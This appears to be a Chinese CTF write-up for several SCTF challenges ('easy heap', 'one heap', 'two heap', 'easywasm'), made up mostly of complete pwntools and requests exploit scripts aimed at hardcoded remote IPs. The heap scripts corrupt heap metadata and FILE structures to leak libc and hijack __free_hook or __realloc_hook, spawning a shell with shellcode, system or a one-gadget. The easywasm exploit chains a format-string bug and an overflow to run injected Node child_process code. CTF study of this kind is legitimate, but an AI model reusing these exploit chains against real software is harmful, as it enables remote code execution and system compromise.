
    匯總

    easy heap

    from pwn import *
    # Target is x86-64 Linux; this fixes the defaults for p64()/u64()/asm() used below.
    context(arch = 'amd64',os='linux')
    def add(size):
        """Allocate a chunk of ``size`` bytes through menu option 1.

        Waits for the menu prompt, picks option 1, answers the size prompt,
        then skips to the ``'0x'`` prefix the service prints and returns the
        12 characters that follow (the caller parses them as a hex address).
        Uses the module-level connection ``p``.
        """
        p.sendlineafter('>>', '1')
        p.sendlineafter('Size', str(size))
        p.recvuntil('0x')
        return p.recv(12)
    
    def dele(idx):
        """Free the chunk at ``idx`` through menu option 2 (uses the global ``p``)."""
        p.sendlineafter('>>', '2')
        p.sendlineafter('Index', str(idx))
    
    def edit(idx, cont):
        """Write ``cont`` into the chunk at ``idx`` through menu option 3.

        ``cont`` is delivered with a raw send (no newline appended), so the
        caller controls the exact bytes written. Uses the global ``p``.
        """
        p.sendlineafter('>>', '3')
        p.sendlineafter('Index', str(idx))
        p.sendafter('Content', cont)
    # Challenge libc; only its __free_hook symbol offset is used below.
    libc = ELF('./libc.so.6')
    #p = process('./easy_heap',env={'LD_PRELOAD':'./libc-2.23.so'})
    # Remote CTF instance; the add()/dele()/edit() helpers above use this global.
    p = remote('132.232.100.67', 10004)
    # The service prints a hex address on connect; it is parsed as mmap_addr.
    p.recvuntil('0x')
    mmap_addr = int(p.recvuntil('\n')[:-1],16)
    # Python 2 print statement (the whole script is Python 2).
    print hex(mmap_addr)
    # add() returns the hex digits printed after '0x': the address of chunk 0.
    ptr_addr = int(add(0x100-8),16)#0
    info("ptr:0x%x",ptr_addr)
    add(0xf8)#1
    add(0xf8)#2
    # Crafted overwrite of chunk 0: size-looking qwords and pointers derived
    # from ptr_addr. The layout is specific to this challenge binary/libc.
    edit(0,p64(0)+p64(0xf1)+p64(ptr_addr-0x18)+p64(ptr_addr-0x10)+(0x100-8-16-8-16)*'\x00'+p64(0xf0))
    dele(1)
    #edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8)+p64(0x90)+p64(ptr_addr+0x30-8)+p64(0)+p64(0x91)+'\x00'*0x80+p64(0x90)+p64(0x91)+'\n')
    
    add(0x80)#1
    add(0x80)#3
    add(0x80)#4
    dele(1)
    dele(4)
    # Second crafted overwrite of chunk 0; mmap_addr is among the written qwords.
    edit(0,p64(0)+p64(0)+p64(0x200)+p64(ptr_addr-8+0x50)+p64(0x200)+p64(mmap_addr)+p64(0)*2+p64(0x80)+'\x28\n')
    edit(3,p64(ptr_addr+0x40)+'\n')
    add(128)
    # Hard-coded byte; the commented-out alternative read it interactively.
    a = 0x16# int(raw_input("a"),16)
    edit(0,p64(0x200)+'\x20'+chr(a)+'\n')
    # Write through index 5, then take the 8 bytes the service prints after
    # three zero qwords and treat them as a libc address.
    edit(5,p64(0xfbad3c80)+p64(0)*3+p8(0)+'\n')
    p.recvuntil(p64(0)*3)
    addr = u64(p.recv(8))
    # The offset is the difference of two absolute addresses copied from a
    # debugging session, so it is valid only for this exact libc build.
    libc_base = addr - (0x7f7af9dfa6e0-0x7f7af9a37000)
    print hex(libc_base)
    free_hook = libc_base+libc.symbols['__free_hook']
    # Shellcode goes into chunk 1; free_hook is then written via chunk 0 and
    # mmap_addr via index 5 (presumably now aliasing free_hook - not checked).
    sh = asm(shellcraft.sh())
    edit(1,sh+'\n')
    edit(0,p64(0x200)+p64(free_hook)+'\n')
    edit(5,p64(mmap_addr)+'\n')
    # Menu option 2 on index 0 (a delete), sent without waiting for prompts.
    p.sendline('2')
    p.sendline('0')
    p.interactive()

    one heap

    用hbase爆破pbase的1/8192變態house of Roman + 1/1的house of three

    from pwn import *
    context.arch = "amd64"
    # Only affects a local process() launch (commented out below); the remote
    # target is unaffected.
    context.aslr = False
    # Challenge libc; its symbol table supplies the offsets used in the loop below.
    libc = ELF("./libc-2.27.so")
    
    def add(size, data, shift=False):
        """Create a note of ``size`` bytes containing ``data`` (menu option 1).

        By default ``data`` is sent with a trailing newline; when ``shift`` is
        set it is sent raw so the caller controls the exact bytes. Uses the
        global connection ``io``.
        """
        io.sendlineafter("choice:", str(1))
        io.sendlineafter("size", str(size))
        # Keep the original `== False` test so any non-False value selects the raw send.
        deliver = io.sendlineafter if shift == False else io.sendafter
        deliver("content:", data)
    def rm():
        """Delete the current note through menu option 2 (uses the global ``io``)."""
        io.recvuntil("choice:")
        io.sendline(str(2))
    # Retry loop: the note above describes the attempt as probabilistic, so a
    # failed run closes the connection and the whole sequence starts over.
    while(True):
        try:
            #io = process("./one_heap",env = {"LD_PRELOAD":"./libc-2.27.so"})
            # Remote CTF instance; the add()/rm() helpers above use this global.
            io = remote('47.104.89.129',10001)
            add(0x60,'0000')
            rm()
            rm()
            # Short writes (3 bytes, 1 byte, a bare newline sent raw); the values
            # are specific to this challenge binary and libc 2.27.
            add(0x60,'\x20\x60\x64')
            add(0x60,' ')
            add(0x60,'\n',shift = True)
            add(0x60,p64(0xfbad1880)+p64(0)*3+"\x58")
            # The 6 leaked bytes are zero-extended to a qword and treated as the
            # runtime address of _IO_file_jumps to recover the libc base.
            lbase = u64(io.recv(6).ljust(8,'\x00'))-libc.sym['_IO_file_jumps']
            success("LBASE -> %#x"%lbase)
            add(0x40,'0000')
            rm()
            rm()
            add(0x40,p64(lbase+libc.sym['__realloc_hook']))
            add(0x40,p64(lbase+libc.sym['__realloc_hook']))
            # Hard-coded libc offset (the name suggests a one-gadget); valid only
            # for this libc build, as is the +0xe adjustment on realloc below.
            one = 0x4f2c5
            add(0x40,p64(lbase+one)+p64(lbase+libc.sym['realloc']+0xe))
            add(0x30,"cat flag\x00")
            #gdb.attach(io,'handle SIGALRM nostop noprint')
            io.interactive()
            raw_input()
        # Python 2 syntax; Python 3 spells this "except Exception as e".
        except Exception,e:
            info(str(Exception)+str(e))
            io.close()

    two heap

    0x1 0x8 0x10 0x18繞size check(都是生成0x20的堆塊)

    from pwn import *
    context.arch = 'amd64'
    #context.aslr = False
    # Challenge libc; its symbol table supplies the offsets used in the loop below.
    libc = ELF("./libc-2.26.so")
    
    def add(size, data):
        """Add a note through menu option 1.

        Answers the size prompt with ``size`` and then sends ``data`` raw (no
        newline appended) at the note prompt. Uses the global connection ``io``.
        """
        io.sendlineafter("choice:", "1")
        io.recvuntil("size:\n")
        io.sendline(str(size))
        io.recvuntil("note:\n")
        io.send(data)
    def rm(idx):
        """Remove the note at ``idx`` through menu option 2 (uses the global ``io``)."""
        io.recvuntil("choice:")
        io.sendline("2")
        io.recvuntil("index:\n")
        io.sendline(str(idx))
    # Retry loop: any exception closes the connection and the sequence reruns.
    while(True):
        try:
            # Remote CTF instance; the add()/rm() helpers above use this global.
            io = remote('47.104.89.129',10002)
            #io = process("./two_heap",env = {"LD_PRELOAD":"./libc-2.26.so"})
            # Format-string probe at the banner prompt (%a prints hex-float form).
            io.sendlineafter("SCTF:\n","%a%a%a%a%a")
            io.recvuntil("0x0.0")
            # 11 hex digits after "0x0.0", shifted left by 4 to rebuild the pointer,
            # which is treated as the runtime address of _IO_2_1_stdout_.
            lbase = (int(io.recv(11),16)<<4)-libc.sym['_IO_2_1_stdout_']
            info("LBASE -> %#x"%lbase)
            add(1,'')
            # NOTE(review): `ls` is not defined in this script (and does not look
            # like a pwn export); as written it raises NameError here, which the
            # except below catches, so the loop restarts. Likely a stray token.
            rm(0);rm(0);ls
            add(8,p64(lbase+libc.sym['__free_hook']))
            add(0x10,'\n')
            add(24,p64(lbase+libc.sym['system'])+'\n')
            add(40,"/bin/sh\x00"+"\n")
            # Menu option 2 on index 4, sent without waiting for prompts.
            io.sendline("2")
            io.sendline("4")
            #gdb.attach(io,'handle SIGALRM nostop noprint')
            io.interactive()
            raw_input()
        # Python 2 syntax; Python 3 spells this "except Exception as e".
        except Exception,e:
            info(str(e))
            io.close()

    easywasm

    出題人:0xd5f 解題人數:0 最終分數:1000

    程序存在一個結構體用于保存信息記錄

    C: `struct { char *username; int password; char *introduction; void (*state)(const char *); } record;`

    先說三個函數邏輯

    registered()用于初始化record結構體

    profile()用于打印username和introduction

    login()用于驗證username和password并通過state函數指針返回登錄成功或失敗的狀態信息

    因為程序存在Z_envZ__emen_run_Z_vi,只需要改變state即可,但是如果成功調用,還需要泄露出password
    其中profile()存在一個溢出漏洞和一個格式化字符串漏洞,通過溢出,我們可以控制任意寫的地址,然后再leak出password即可,許多payload的細節可以調試知道
    不過帶師傅們好像更熱衷于ddos,Orz
    exp

    import requests
    
    url = 'http://47.104.89.129:23333/'
    
    # Endpoints of the three handlers described above.
    registered = url + 'registered'
    profile = url + 'profile'
    login = url + 'login'
    
    # Query-parameter names the service expects.
    username = 'username'
    password = 'password'
    introduction = 'introduction'
    
    # Introduction payload: 7 filler bytes, a JavaScript snippet padded to 0x7f
    # bytes, then a terminator sequence. The layout is specific to the challenge
    # binary; the writeup above describes the overflow it relies on.
    payload = ''
    payload += 'A'*7
    payload += ''' const exec=require("child_process").exec; exec("cat flag", function(error,stdout,stderr){process.stdout.write(stdout);}); '''.ljust(0x7f, ' ')
    payload += '//\x3C\x0D\x00'
    
    # Register with a format-string username plus the payload, then read the
    # password back from the profile page.
    params = { username: '%2$0141d%1$n', introduction: payload }
    requests.get(registered, params=params)
    req = requests.get(profile)
    # NOTE(review): lstrip/rstrip strip character *sets*, not literal
    # prefixes/suffixes; this only yields the password intact if it contains
    # none of those characters (presumably it is numeric - not verified here).
    passwd = req.text.lstrip('Welcome, ').rstrip('Your introduction: AAAAAAA')
    
    params = { username: '%2$0141d%1$n', password: passwd }
    requests.get(login, params=params)
    

    本文章首發在 網安wangan.com 網站上。
